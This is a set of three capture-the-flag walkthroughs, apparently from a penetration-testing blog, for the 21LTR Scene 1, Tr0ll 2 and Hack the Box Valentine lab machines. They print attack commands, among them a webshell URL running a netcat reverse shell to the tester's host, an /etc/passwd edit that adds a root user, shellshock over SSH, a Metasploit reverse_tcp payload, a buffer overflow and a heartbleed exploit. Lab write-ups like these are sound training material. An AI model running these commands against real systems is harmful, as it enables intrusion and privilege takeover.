Hack the 21LTR: Scene 1 VM (Boot to Root)

21LTR VM is a Boot to Root Challenge based on a scene that there is a penetration testing company and it has hired the players to perform the test on a client company’s internal network. We are given that the Target Machine has a static IP Address. You can download it from here: https://www.vulnhub.com/entry/21ltr-scene-1,3/

Penetrating Methodologies:

§  Network Scanning (Nmap,Netdiscover)

§  Examining HTTP web page

§  FTP Login for log.php file

§  Use php web shell one liner

§  Insert netcat reverse_shell payload

§  Spawn TTY shell

§  Editing passwd file for Privilege escalation

§  Get Root access

Let’s Begin

Target Machine’s IP Address: 192.168.2.120

Our first step towards penetration testing is scan our target with NMAP.

nmap 192.168.2.120

Result showed us that there are 4 ports opened: 21(ftp), 22(ssh), 80(http), 10001(scp-config).

To further explore and we browsed URL on port 80 and we greeted with a C Program featuring a loop as show in the given image.

http://192.168.2.120

After this we thought to check it’s the source code which lead us to some Logon Credentials.

Username: logs

Password: zg]E-b0]+8:(58G

So, we tried to connect with FTP through the logon credentials we found. After the successful login, we looked around to find a backup_log.php file which we downloaded to our local machine to have a closer look.

ftp 192.168.2.120

After Downloading the file to our local system, we used the cat command to open the file in our terminal as you can see that it contains a php program that is used to generate backup logs on the target system.

cat backup_log.php

Let’s see what we can find by directory brute forcing.

dirb http://192.168.2.120

It got us some directories but /logs looks more interesting so Let’s browse http://192.168.2.120/logs/

But as you can see in the image given below is that the logs directory is forbidden to access.

We tried to run some commands but didn’t get much success here.

This is where we got a bit stuck so after some internet searching hours we got in touch with the author of the lab and after his hint we got that we have to further twerk the 10001 port.

nc -nv 192.168.2.120 10001

We started a netcat session on the port 10001, we got a blank shell, which using a php one liner webshell

Now after using that php one liner, let’s see if we can run some commands. We tried to run whoami command. It replied with apache. This proves that we can run commands from here.

http://192.168.2.120/logs/backup_login.php?cmd=whoami

As we observed above that the commands run successfully, now we will try to get a reverse shell on our local machine using netcat. We will be doing this as shown in the image.

http://192.168.2.120/logs/backup_login.php?cmd=nc -e /bin/sh 192.168.2.12 443

Meanwhile we ran that command we also started a netcat listener on our local machine so as to get the shell which will be generated.

And as you can see that we got a basic bash shell on port 443 as shown in the image.

But this was an incomplete and improper shell so we invoked a proper shell using a python one liner

python -c 'import pty; pty.spawn("/bin/sh")'

Now, we are in the target machine but still we have to escalate the privilege to become root. Here we started to enumerate the target machine for any possible way to get root.

After looking for a while we found a rsa private key in the media directory. We copied the key to our local machine.

cat id_rsa

Now we navigated to the user “passwd file” to get the info about the username that we can use for getting the ssh session. We found hbeale.

Now the RSA Private we copied, we saved it as id_rsa and change its permission using the chmod command so that it can act as a ssh private key.

chmod 600 id_rsa

After this we tried to connect to the target machine using ssh by user hbeale and the private key.

ssh -i id_rsa hbeale@192.168.2.120

And as you can see in the image given that we successfully got the shell of user hbeale. But as this is a boot to root challenge we have to escalated this shell into a root shell.

We used the sudo -l command to extract the information about the command that can be ran as root. We found out that we can run cat command.

Now back to our local machine, here we will use the openssl command to create a password salt for our new user that we will use to log into the target machine.

openssl passwd -1 -salt user3 pass123

On the Target machine we use the cat command to edit the /etc/passwd file with the logon credentials of the user we meant to create (which is going to have the root privileges).

After successfully edit the /etc/passwd file, we will substitute the new user we created using the su command.

After entering the password which we created earlier, we logon to the root shell. This concludes this Boot to Root Challenge. 

Hack the Tr0ll 2 (CTF challenge)

Hello everyone and welcome to this CTF challenge. This is the next part to Tr0ll by Maleus. You can download the lab from here. The objective of this lab is to get root and read the flag.

The level of this challenge is not so tough and its difficulty level is described as beginner/intermediate.

Penetrating Methodologies

§  Network scanning (Nmap, Netdiscover)

§  Information Gathering

§  Analysing web source code

§  Get robort.txt

§  Directory enumeration with the help of robots.txt (Dirb)

§  Found encoded answer.txt file

§  Decoding base64 text file

§  FTP login for Zip file

§  Cracking zip file (Fcrackzip)

§  Exploiting shellshock to get shell in bash.

§  Spwan tty shell (Metasploit)

§  Privilege escalation

§  Finding vulnerable binary

§  Finding EIP offset

§  Exploiting buffer overflow

§  Getting root flag

So, let’s get started!

First step is as always, IP grabbing. In my case the IP was 192.168.1.131

Next step was port scanning and discovery of open ports using nmap.

nmap -A 192.168.1.131

And we found 3 ports open- 21, 22, 80

So, we tried to open the IP in browser to see what was in the web page and sure as hell, that troll face again! It really did live up to its name after all!

So, we opened the home page’s source code using curl:

curl http://192.168.1.131

We, then enumerated the IP using dirb to find something interesting and something did catch our eyes—robots.txt

dirb http://192.168.1.131

So, we opened robots.txt in web browser and we saw a lot of directory names.

So, we downloaded robots.txt using wget and tried to make a dictionary out of it in hope that we find something good in one of them.

wget http://192.168.1.131/robots.txt

nano robots.txt

(Removed the ‘/’ from each line and saved it)

Enumerating it again with the custom dictionary we just made, few other directories were found.

dirb http://192.168.1.131/robots.txt

So, we hit each directory on browser and inspected each image since there was nothing else to play with in the directories.

One by one we started searching each directory but nothing appealed to us. It all had the same troll image.

We checked the source code of the page but nothing seemed good.

Hence, we downloaded cat_the_troll.jpg from each directory but one such directory called dont_bother had something interesting in its image.

wget http://192.168.1.131/dont_bother/cat_the_troll.jpg

We read the last three lines of the image’s coding using tail command:

tail –n 3 cat_the_troll.jpg

The code really said to look deep within “y0ur_self” to find the answer. Could it be a directory? lets find out.

Voila! It indeed is a directory and really has an answer in it. But on opening answer.txt, the dictionary seemed to be base64 encoded.

We again downloaded the answer.txt file using wget and decoded it into a new file decoded.txt

wget http://192.168.1.131/y0ur_self/answer.txt

Decoded it using:

base64 –d answer.txt>decoded.txt

Let’s save this dictionary for future use and move on to another port we discovered—the FTP port.

We had no idea of the username and password and neither was there any password or username file found.

But remember the very first source code we viewed? It had the author name Tr0ll.

Could that be the username and default password for FTP?

It was a complete hit and try method but we successfully got logged in!

ftp 192.168.1.131

ls

get lmao.zip

We found a zip file “lmao.zip” in FTP. But the zip had password protection.

Wait… what about the file we just decoded? Could it have password for the zip file?

fcrackzip –u –D –p decoded.txt lmao.zip

We found the password!

Let’s unzip the file now.

unzip lmao.zip

And enter the password: ItCantReallybeThisEasyRightLOL

We had high curiosity about the file “noob”.

cat noob

Turned out, it was an RSA key to SSH

Without any delay we tried to login to SSH using this RSA key but we got trolled, yet again!

chmod 600 noob

ssh –i noob noob@192.168.1.131

A complete arrow in the dark was to exploit shellshock vulnerability in SSH. So, we tried command:

ssh –i noob noob@192.168.1.131 ‘() ( : ;};  /bin/bash’

And we got logged in!

id

But it isn’t a proper teletype. We used web delivery in metasploit to create a python shell to get a proper meterpreter session.

msf > use multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost  192.168.1.132

msf exploit(multi/script/web_delivery) > set lport 4444

msf exploit(multi/script/web_delivery) > run

We copied above generated python code to the improper bash we just created.

On the other hand, we had got a meterpreter session.

sysinfo

Let’s get into the shell and try to spawn a proper teletype.

shell

python –c “import pty;pty.spawn(‘/bin/bash’);”

find / -perm -4000 2>/dev/null

The r00t binary in these directory work differently, and change their behaviour with each other on every reboot. One of these binary (in our case it was in door2, it changes on reboot) accept a string as argument and print it.

We open the binary in gdb debugger to look at the assembly code for the binary. At main+71 we find a strcpy function, as strcpy function is vulnerable to buffer overflow we try to exploit it.

First we create a 500 bytes long string to find the EIP offset using patter_create script.

./pattern_create.rb -l 500

We run the file in gdb along with the 500-byte character as the argument and find that the EIP register was overwritten with 0x6a413969.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of 268. So we need to write 268 characters and then write the address of the instructions we want to be executed.

./pattern_offset.rb -q 6a413969

After getting the offset we find the ESP and find it to be 0xbffffc70 but we create our exploit and execute it we get an error with illegal instruction that is because gdb has a different environment. Now we remove 1 byte and take the ESP to be 0xbffffc80. We run the binary by ignoring the environment along the exploit as the argument. As soon as we run the exploit we get a spawn a shell as root, we open the /root directory and find a file called Proof.txt. We take a look at the content of the files and find the final flag.

Hack the Box: Valentine Walkthrough

Hello friends! Today we are going to solve the CTF challenge “Valentine” which is a vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have a very good collection of vulnerable labs as challenges from beginners to Expert level.

Difficulty Level: Medium

Task: find user.txt and root.txt file on victim’s machine.

Steps involved:

§  Port scanning  and services detection

§  Web server directory enumeration

§  Discovery of hex encoded ssh key

§  Decoding key

§  Finding Passphrase

§  Capturing user flag

§  Capturing root flag

This lab has a static IP and IP of 10.10.10.79. So let’s start the CTF challenge with port scanning.

nmap –A 10.10.10.79

From its scanning result we found port 22 and 80 are open for ssh and http services.

Let’s enumerate the web service running on port 80.  The below image could be a hint, there is a heart and blood. Does it mean heartbleed?  Could be!  Let’s enumerate further.

Let’s see what we can find by directory brute forcing:

Dirb http://10.10.10.79

It put so many files but /dev looks more interesting so Lets browse http://10.10.10.73/dev.

Great we found some directories here. Let’s manually check these directories one by one.

The directory “dev” seems very interesting, There are two files as shown in the below images.

Firstly I opened notes.txt file as shown in the below image, it seems there is some encoding and decoding is involved.

Then we opened another file hype_key and notice found encoded hex text, let’s convert it into plain text and see if it makes any sense.

With help of burp we try to decode above hex into plain text as shown in the image. So it’s a RSA private key, but it has space after each character, which needs to be fixed.

After removing space using sed command, we get our key as shown in the image below. Now all we need is a passphrase.

sed ‘s/ //g’ key> sshkey

cat sshkey

Checking if the HTTPS web service is vulnerable to heartbleed with help of nmap script.

nmap –p 443 –script ssl-heartbleed 10.10.10.79

As expected the service is vulnerable to heartbleed, now let’s try to exploit it.

Searching heartbleed exploit using searchsploit, and luckily found a python exploit 32764.py in our local system.

searchsploit heartbleed

So I copied the python exploit on the desktop and run against target’s IP for exploiting heartbleed.

python 32764.py 10.10.10.79

Wow! It worked perfectly as aspect.

As shown in the image above, there is a string. Let’s decode the string with the help of following command, it may give the passphrase for ssh login.

echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 –d

Now let’s try to login SSH using the key and passphrase and after making successful login we found user.txt file from inside /home/hype/Desktop

ssh –i key hype@10.10.10.79

cd /home

ls

cd hype

ls

cd Desktop

ls

cat user.txt

So we logged in successfully and captured the user flag. Here 1^st task is completed; let’s find out root.txt to finish the 2^nd task.

During further enumerating the history of commands on the system, we found some interesting commands

cat .bash_history

tmux –S /.devs/dev_sess

Hmm!!! We got the root as shown in last image.

Now let’s grab the root.txt file quickly and finish this task. On running the below command we got our Root flag.

cd /root

ls

cat root.txt

We finished both tasks successfully!!